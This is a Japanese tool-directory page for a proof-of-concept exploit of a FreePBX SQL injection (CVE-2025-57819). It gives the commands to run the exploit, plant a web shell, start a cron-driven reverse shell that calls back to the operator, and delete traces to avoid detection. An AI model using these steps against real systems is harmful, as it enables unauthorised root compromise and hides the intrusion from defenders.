Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2025-5781 — CVE-2025-57819(FreePBX)向けのProof-of-Conceptエクスプロイト:AJAX APIのSQLインジェクションを利用して任意のPHPを実行し、永続的なウェブシェルを作成して、リバースシェルを起動します。 | Kitploit
ツール/GitHubGitHub/jasonbernier/cve-2025-5781
永続化メカニズムエクスプロイトウェブアプリケーション悪用ポストエクスプロイトコマンド&コントロールペイロード開発
GitHubjasonbernier/cve-2025-5781

CVE-2025-5781

CVE-2025-57819(FreePBX)向けのProof-of-Conceptエクスプロイト:AJAX APIのSQLインジェクションを利用して任意のPHPを実行し、永続的なウェブシェルを作成して、リバースシェルを起動します。

リポジトリを見る
529日前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

FreePBX CVE-2025-57819 エクスプロイト

説明

このスクリプトは、FreePBX 16.0.26.0 未満のバージョン(CVE-2025-57819)の脆弱性を悪用し、AJAX API エンドポイントの SQL インジェクションの欠陥を介して、リモート攻撃者が任意の PHP コードを実行できるようにします。このエクスプロイトは、ウェブシェルと自動起動するリバースシェルの両方を作成します。

脆弱性の詳細

  • CVE: CVE-2025-57819
  • 影響を受けるバージョン: FreePBX < 16.0.26.0
  • 影響: リモートコード実行 (RCE)
  • ベクトル: AJAX API の SQL インジェクション (/admin/ajax.php)

特徴

  • /pbxshell.php に永続的なウェブシェルを作成
  • cron ジョブを介して自動起動するリバースシェルをセットアップ
  • Base64 エンコードされたペイロードを使用してフィルターをバイパス
  • 実行後に cron ジョブを自動クリーンアップ

必要条件

  • Python 3.x
  • requests ライブラリ
  • Netcat(リバースシェルリスナー用)

インストール

root@kitploit:~
git clone https://github.com/jasonbernier/CVE-2025-5781.git
cd CVE-2025-5781
pip install requests

使用方法

root@kitploit:~
python3 exploit.py -H TARGET_HOST -lhost LHOST -lport LPORT

パラメータ:

  • -H HOST: ターゲットの FreePBX インスタンス(例: https://freepbx.example.com)
  • -lhost LHOST: リバースシェルのコールバック用のあなたの IP
  • -lport LPORT: リバースシェル接続用のポート

例:

root@kitploit:~
python3 exploit.py -H https://target.freepbx.com -lhost 10.0.0.1 -lport 4444

エクスプロイトの流れ

  1. SQL インジェクションペイロードを送信してウェブシェルを作成
  2. ウェブシェルが作成されるのを待機(約2分)
  3. cron ジョブを介して自動起動するリバースシェルを作成
  4. 指定されたポートで netcat リスナーを起動

ウェブシェルの使用方法

悪用に成功した後、以下のようにウェブシェルにアクセスします:

root@kitploit:~
curl -X GET "http://TARGET/pbxshell.php?cmd=id"

クリーンアップ

このエクスプロイトは、検出を避けるために実行後に cron ジョブを自動的に削除します。

注意事項

  • このスクリプトは -- を使用して残りの SQL 構文をコメントアウトします
  • すべてのコマンドは root 権限で実行されます
  • /var/www/html/ ディレクトリへの書き込みアクセスが必要です

参考情報

  • CVE-2025-57819
  • FreePBX セキュリティアドバイザリ
ツールをダウンロード